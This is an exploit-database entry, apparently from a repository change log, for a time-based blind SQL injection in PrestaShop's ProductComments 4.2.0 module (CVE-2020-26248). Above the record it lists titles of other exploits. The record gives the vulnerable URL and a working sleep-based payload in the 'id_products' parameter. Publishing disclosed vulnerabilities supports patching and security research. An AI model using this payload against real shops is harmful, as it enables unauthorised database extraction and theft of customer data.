
6 changes to exploits/shellcodes Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption Adobe (Multiple Products) - XML Injection File Content Disclosure GitLab 11.4.7 - Remote Code Execution (Authenticated) Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting Raysync 3.3.3.8 - RCE Magic Home Pro 1.5.1 - Authentication Bypass PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection Seotoaster 3.2.0 - Stored XSS on Edit page properties
14 lines
No EOL
624 B
Text
14 lines
No EOL
624 B
Text
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
|
||
# Date: 2020-12-15
|
||
# Exploit Author: Frederic ADAM
|
||
# Author contact: contact@fadam.eu
|
||
# Vendor Homepage: https://www.prestashop.com
|
||
# Software Link: https://github.com/PrestaShop/productcomments
|
||
# Version: 4.2.0
|
||
# Tested on: Debian 10
|
||
# CVE : CVE-2020-26248
|
||
|
||
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
|
||
|
||
Example:
|
||
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a) |